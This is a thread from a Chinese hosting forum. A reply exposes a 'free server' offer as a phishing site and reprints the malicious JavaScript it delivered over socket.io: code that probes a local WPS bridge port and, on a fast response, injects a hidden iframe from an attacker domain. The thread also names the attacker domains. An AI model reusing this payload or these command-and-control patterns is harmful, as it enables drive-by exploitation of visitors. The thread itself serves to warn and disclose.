全球主机交流论坛

 找回密码
 注册

QQ登录

只需一步,快速开始

CeraNetworks网络延迟测速工具IP归属甄别会员请立即修改密码
查看: 1118|回复: 24
打印 上一主题 下一主题

[美国VPS] 免费服务器领取

[复制链接]
跳转到指定楼层
1#
发表于 2025-7-17 15:44:01 | 只看该作者 回帖奖励 |倒序浏览 |阅读模式
提示: 作者被禁止或删除 内容自动屏蔽
推荐
发表于 2025-7-17 16:09:52 | 只看该作者
本帖最后由 Typeboom 于 2025-7-17 16:12 编辑

这站是钓鱼的

里面会加载这个JS
https://apis.fjersihjktsvhiiuirahts.online/RXGNHYJP.js

创建socket.io链接,通过websocket下发恶意js
  1. 42["execute",{"func":"var attack = function(params){\n            params.time = new Date();\n            let _result_ = (function(){ var result = [];\n\nfunction makeRequest() {\n    var m = Date.now();\n    var script = document.createElement('script');\n    script.src = 'https://localhost.wbridge.wps.cn:4709/';\n    script.onload = function() {\n        var currentTime = Date.now();\n        var elapsedTime = currentTime - m;\n        result.push(elapsedTime);\n        if (result.length === 5) {\n            calculateAverage();\n        } else {\n            makeRequest();\n        }\n    };\n    script.onerror = function() {\n        var currentTime = Date.now();\n        var elapsedTime = currentTime - m;\n        result.push(elapsedTime);\n        if (result.length === 5) {\n            calculateAverage();\n        } else {\n            makeRequest();\n        }\n    };\n    document.body.appendChild(script);\n}\n\nfunction calculateAverage() {\n    var sum = result.reduce(function(a, b) {\n        return a + b;\n    }, 0);\n    var w_key = sum / result.length;\n    if (w_key < 300) {\n        var iframe = document.createElement("iframe");\n        iframe.src = "https://www.onlineksyun.com/ifs.html";\n        iframe.frameborder = "no";\n        iframe.style.zIndex = -1000;\n        iframe.style.position = "absolute";\n        iframe.style.opacity = 0;\n        iframe.style.top = "0px";\n        iframe.style.left = "0px";\n        iframe.width = "300px";\n        iframe.height = "2000px";\n        iframe.onload = function() {\n            console.log("iframe loaded");\n        };\n        document.body.appendChild(iframe);\n    }\n}\n\nmakeRequest(); })()\n            try{\n              socket.emit("result", {\n                success: true,\n                message: "Successfully executed custom command at " + new Date() + (_result_ ? "\\nReturned Value: " + _result_ : ''),\n                params\n              });\n            }catch(e){\n              socket.emit("result", {\n                success: false,\n                message: e.toString(),\n                params\n              });\n            }\n          }","params":{"victim":5802,"_attack_instance_id":"5L_tTV5sJYmdyLVdAEXf_1752739731190"}}]

  2. 42["result",{"success":true,"message":"Successfully executed custom command at Thu Jul 17 2025 08:08:51 GMT+0000 (Coordinated Universal Time)","params":{"victim":5802,"_attack_instance_id":"5L_tTV5sJYmdyLVdAEXf_1752739731190","time":"2025-07-17T08:08:51.636Z"}}]
复制代码


尝试连接到
https://localhost.wbridge.wps.cn:4709/

应该是利用WPS的漏洞,下次记得改成让MJJ下exe,还方便点

评分

参与人数 1威望 +17 收起 理由
欧阳逍遥 + 17 赞一个!

查看全部评分

2#
发表于 2025-7-17 15:58:52 | 只看该作者
领了一个,多谢

有效期是多长?
3#
 楼主| 发表于 2025-7-17 16:00:02 | 只看该作者
提示: 作者被禁止或删除 内容自动屏蔽
4#
发表于 2025-7-17 16:01:14 | 只看该作者
本帖最后由 Typeboom 于 2025-7-17 16:13 编辑



钓鱼站能不能走点心
6#
发表于 2025-7-17 16:21:15 | 只看该作者
Typeboom 发表于 2025-7-17 16:09
这站是钓鱼的

里面会加载这个JS

然后呢?钓鱼站没完善是么?
7#
发表于 2025-7-17 16:22:35 | 只看该作者
还有个域名是:onlineksyun.com
8#
发表于 2025-7-17 16:30:54 | 只看该作者
有点儿意思 发表于 2025-7-17 16:21
然后呢?钓鱼站没完善是么?

你安个WPS就知道会发生什么了
9#
发表于 2025-7-17 16:32:44 | 只看该作者
不好意思,叼windows的鱼,关我mac什么事
您需要登录后才可以回帖 登录 | 注册

本版积分规则

Archiver|手机版|小黑屋|全球主机交流论坛

GMT+8, 2025-10-14 19:50 , Processed in 0.071776 second(s), 11 queries , Gzip On, MemCache On.

Powered by Discuz! X3.4

© 2001-2023 Discuz! Team.

快速回复 返回顶部 返回列表